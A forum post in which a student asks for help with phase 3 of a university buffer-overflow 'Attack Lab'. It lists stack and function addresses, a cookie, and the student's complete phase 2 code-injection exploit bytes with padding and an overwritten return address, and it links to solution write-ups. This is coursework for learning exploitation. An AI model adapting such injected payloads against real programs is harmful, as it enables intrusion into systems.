Attack Lab Phase 3
I am stuck on attack lab phase 3. I have a 28 byte buffer in getbuf.
This is my rsp address:
0x5565c940
This is my touch 3 address:
0x4018d0
This is my cookie:
0x7fef911b
In byte code the cookie is:
37 66 65 66 39 31 31 62
I just can't seem to figure out the padding. It seems as if all the examples use the same padding value from their phase 2.
My phase 2 had a different approach than all the online examples.
Here was my phase 2 answer:
68 fb 17 40 00 bf 1b 91 ef 7f c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
18 c9 65 55 00 00 00 00
I pushed the return address of phase 2 to the stack, moved my cookie to rdi.
I'm stuck now because I don't really know how to calculate the padding values for phase 3. The idea is that we can't store our cookie in the getbuf stack because the hexmatch function will overwrite it and mess up our cookie. So we store the cookie outside of the getbuf. You can refer to this, I think it's helpful somehow: https://github.com/magna25/Attack-Lab/blob/master/Phase%203.md
or this: https://siyangshao.github.io/posts/202206240956/